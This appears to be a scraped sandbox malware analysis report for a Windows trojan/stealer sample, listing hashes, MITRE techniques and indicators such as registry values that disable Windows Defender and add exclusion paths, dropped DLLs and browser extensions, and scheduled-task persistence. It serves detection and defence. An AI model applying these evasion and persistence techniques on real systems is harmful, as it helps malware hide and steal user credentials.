bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098

Analysis

max time kernel
232s
max time network
233s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 05:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe
Size

7.2MB
MD5

b7893916be6505d7cf249178f571473b
SHA1

938984ddaca77c6abceb1d54120344fe0f0f131f
SHA256

bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098
SHA512

e80841a96b2e97a5caf11653e25d79001c541ed166dfdc9288e5016ac2fb1e4636a411c3a760e2f3c0578cb7a2529be3dfbd97dcc8ee2f9d5a6342d4ad7dc07f
SSDEEP

196608:91OYZUsjL/JXwFR+LPg/QEFNtPcBJQ/e1nf9P:3OoUwLFLqFNtky/8fZ

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nWWVEJXizSHU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fLdzueVMGzfAC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RNplELueU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\evUSZSaqPkAEukVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uYPtQNsySKcOueCgHDR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ushFnVEJKMUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nWWVEJXizSHU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uYPtQNsySKcOueCgHDR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ushFnVEJKMUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\evUSZSaqPkAEukVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RNplELueU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fLdzueVMGzfAC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

27 2376 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exe

pid process

2548 powershell.exe
1696 powershell.EXE
1876 powershell.EXE
288 powershell.exe
1924 powershell.EXE
2856 powershell.exe
1624 powershell.exe

flow	pid	process
27	2376	rundll32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

HPEfvXg.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation HPEfvXg.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeNsUPKyH.exeHPEfvXg.exe

pid process

2612 Install.exe
1252 Install.exe
1956 NsUPKyH.exe
760 HPEfvXg.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation	HPEfvXg.exe

pid	process
2612	Install.exe
1252	Install.exe
1956	NsUPKyH.exe
760	HPEfvXg.exe

Loads dropped DLL 23 IoCs

Processes:

bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exeInstall.exeInstall.exeWerFault.exerundll32.exeWerFault.exeWerFault.exe

pid	process
2440	bde9a50b5ff13d833fa92ce6b728ecc2dccb78c165e05ec6af72dc52cf19e098.exe
2612	Install.exe
2612	Install.exe
2612	Install.exe
2612	Install.exe
1252	Install.exe
1252	Install.exe
1252	Install.exe
552	WerFault.exe
552	WerFault.exe
552	WerFault.exe
2376	rundll32.exe
2376	rundll32.exe
2376	rundll32.exe
2376	rundll32.exe
764	WerFault.exe
764	WerFault.exe
764	WerFault.exe
764	WerFault.exe
2944	WerFault.exe
2944	WerFault.exe
2944	WerFault.exe
764	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

HPEfvXg.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	HPEfvXg.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	HPEfvXg.exe

Drops file in System32 directory 24 IoCs

Processes:

NsUPKyH.exepowershell.EXEHPEfvXg.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exerundll32.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	NsUPKyH.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	NsUPKyH.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	HPEfvXg.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	HPEfvXg.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	NsUPKyH.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	NsUPKyH.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	HPEfvXg.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	HPEfvXg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe

Drops file in Program Files directory 13 IoCs

Processes:

HPEfvXg.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	HPEfvXg.exe
File created	C:\Program Files (x86)\nWWVEJXizSHU2\DPxvzjGYsCssR.dll	HPEfvXg.exe
File created	C:\Program Files (x86)\fLdzueVMGzfAC\yRrWBrX.dll	HPEfvXg.exe
File created	C:\Program Files (x86)\ushFnVEJKMUn\JpaKjQU.dll	HPEfvXg.exe
File created	C:\Program Files (x86)\nWWVEJXizSHU2\hlnAWFn.xml	HPEfvXg.exe
File created	C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\gMEIRqd.dll	HPEfvXg.exe
File created	C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\fosalXe.xml	HPEfvXg.exe
File created	C:\Program Files (x86)\fLdzueVMGzfAC\lVkSiXj.xml	HPEfvXg.exe
File created	C:\Program Files (x86)\RNplELueU\PvjYCs.dll	HPEfvXg.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	HPEfvXg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	HPEfvXg.exe
File created	C:\Program Files (x86)\RNplELueU\pLzJyIR.xml	HPEfvXg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	HPEfvXg.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\wgFtIVrBuHdIdLf.job	schtasks.exe
File created	C:\Windows\Tasks\vczjtXgpVbXDKOBgh.job	schtasks.exe
File created	C:\Windows\Tasks\bBfKaGDnIKdTdJZScE.job	schtasks.exe
File created	C:\Windows\Tasks\QVuDljbAZykxnpoWI.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

552 1956 WerFault.exe NsUPKyH.exe
764 1252 WerFault.exe Install.exe
2944 760 WerFault.exe HPEfvXg.exe

pid	pid_target	process	target process
552	1956	WerFault.exe	NsUPKyH.exe
764	1252	WerFault.exe	Install.exe
2944	760	WerFault.exe	HPEfvXg.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

HPEfvXg.exeNsUPKyH.exewscript.exerundll32.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	NsUPKyH.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	NsUPKyH.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-76-30-27-5e-e6\WpadDecisionTime = b0b632ef74cbda01	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	HPEfvXg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-76-30-27-5e-e6\WpadDecisionReason = "1"	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	HPEfvXg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ce000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C5C8AD61-8E54-4317-B312-FE812AD47FA0}\WpadDecisionTime = b0b632ef74cbda01	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	HPEfvXg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	HPEfvXg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-76-30-27-5e-e6\WpadDetectedUrl	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	NsUPKyH.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C5C8AD61-8E54-4317-B312-FE812AD47FA0}\WpadNetworkName = "Network 3"	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	HPEfvXg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	NsUPKyH.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-76-30-27-5e-e6\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	HPEfvXg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000105752de74cbda01	NsUPKyH.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C5C8AD61-8E54-4317-B312-FE812AD47FA0}	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	HPEfvXg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	HPEfvXg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	HPEfvXg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	HPEfvXg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	HPEfvXg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C5C8AD61-8E54-4317-B312-FE812AD47FA0}\c2-76-30-27-5e-e6	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-76-30-27-5e-e6\WpadDecision = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0246ade74cbda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	HPEfvXg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2080	schtasks.exe
1564	schtasks.exe
1772	schtasks.exe
2184	schtasks.exe
1660	schtasks.exe
288	schtasks.exe
2804	schtasks.exe
2992	schtasks.exe
280	schtasks.exe
2292	schtasks.exe
2996	schtasks.exe
2284	schtasks.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEHPEfvXg.exepowershell.exepowershell.exe

pid	process
2548	powershell.exe
1696	powershell.EXE
1696	powershell.EXE
1696	powershell.EXE
1876	powershell.EXE
1876	powershell.EXE
1876	powershell.EXE
288	powershell.exe
1924	powershell.EXE
1924	powershell.EXE
1924	powershell.EXE
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
760	HPEfvXg.exe
